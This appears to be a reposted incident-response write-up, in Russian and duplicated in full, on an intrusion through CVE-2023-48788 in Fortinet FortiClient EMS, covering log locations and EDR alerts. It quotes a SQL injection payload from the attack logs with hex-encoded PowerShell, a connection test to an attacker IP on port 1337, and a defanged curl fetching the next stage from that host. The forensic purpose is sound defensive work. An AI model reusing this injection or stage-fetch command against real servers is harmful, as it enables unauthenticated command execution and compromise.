Думаю что будет полезно
Источник:
Мой коллега по команде @hackerkartellet расследовал вторжение на этой неделе, начавшееся через CVE-2023-48788: уязвимость в приложении Fortinet FortiClient EMS, которая позволяет неаутентифицированным пользователям выполнять команды (с правами SYSTEM) с помощью специально сформированных сообщений, как подробно описано @Horizon3Attack [1].
Предварительным условием для эксплуатации уязвимости является доступность порта EMS 8013 (TCP) из Интернета, что и было в нашем расследовании.
Horizon3 опубликовал свой код доказательства концепции 20 марта 2024 года [2]. Модуль Metasploit последовал 12 апреля 2024 года [3].
Но только на этой неделе клиент заметил уязвимое приложение, потому что EDR выдал предупреждение (sqlservr.exe -> cmd.exe -> powershell.exe). Как неоднократно упоминалось, защита периметра критически важна, включая регулярное сканирование периметра на наличие уязвимостей. Специальный сканер уязвимостей мог бы обнаружить эту уязвимость, и патч мог бы быть применен вовремя.
В этом случае есть несколько судебно-медицинских находок: журналы fcmdaemon хранятся в каталоге C:\Program Files (x86)\Fortinet\FortiClientEMS\logs, например: fcmdaemon[2024-05-15 04-39-09].log.
Если мы посмотрим на модуль Metasploit, мы увидим, что полезная нагрузка объединена здесь: CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}).
Когда мы ищем ключевое слово VARCHAR в журналах, мы действительно видим ссылки на этот модуль Metasploit:
OR 1=1; DECLARE SQL
VARCHAR(118) = CONVERT(VARCHAR(MAX), 0X706F7765727368656C6C2E65786520746573742D6E6574636F6E6E656374696F6E203138352E3231362E37302E313730202D706F72742031333337);
Что, когда мы декодируем обратно из hex, является исходным тестом соединения:
powershell.exe test-netconnection 185.216.70.170 -port 1337
За которым следует следующий этап цепочки эксплуатации:
curl hXXp://185.216.70.170:1337
Источник:
Мой коллега по команде @hackerkartellet расследовал вторжение на этой неделе, начавшееся через CVE-2023-48788: уязвимость в приложении Fortinet FortiClient EMS, которая позволяет неаутентифицированным пользователям выполнять команды (с правами SYSTEM) с помощью специально сформированных сообщений, как подробно описано @Horizon3Attack [1].
Предварительным условием для эксплуатации уязвимости является доступность порта EMS 8013 (TCP) из Интернета, что и было в нашем расследовании.
Horizon3 опубликовал свой код доказательства концепции 20 марта 2024 года [2]. Модуль Metasploit последовал 12 апреля 2024 года [3].
Но только на этой неделе клиент заметил уязвимое приложение, потому что EDR выдал предупреждение (sqlservr.exe -> cmd.exe -> powershell.exe). Как неоднократно упоминалось, защита периметра критически важна, включая регулярное сканирование периметра на наличие уязвимостей. Специальный сканер уязвимостей мог бы обнаружить эту уязвимость, и патч мог бы быть применен вовремя.
В этом случае есть несколько судебно-медицинских находок: журналы fcmdaemon хранятся в каталоге C:\Program Files (x86)\Fortinet\FortiClientEMS\logs, например: fcmdaemon[2024-05-15 04-39-09].log.
Если мы посмотрим на модуль Metasploit, мы увидим, что полезная нагрузка объединена здесь: CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}).
Когда мы ищем ключевое слово VARCHAR в журналах, мы действительно видим ссылки на этот модуль Metasploit:
OR 1=1; DECLARE SQL
VARCHAR(118) = CONVERT(VARCHAR(MAX), 0X706F7765727368656C6C2E65786520746573742D6E6574636F6E6E656374696F6E203138352E3231362E37302E313730202D706F72742031333337);
Что, когда мы декодируем обратно из hex, является исходным тестом соединения:
powershell.exe test-netconnection 185.216.70.170 -port 1337
За которым следует следующий этап цепочки эксплуатации:
curl hXXp://185.216.70.170:1337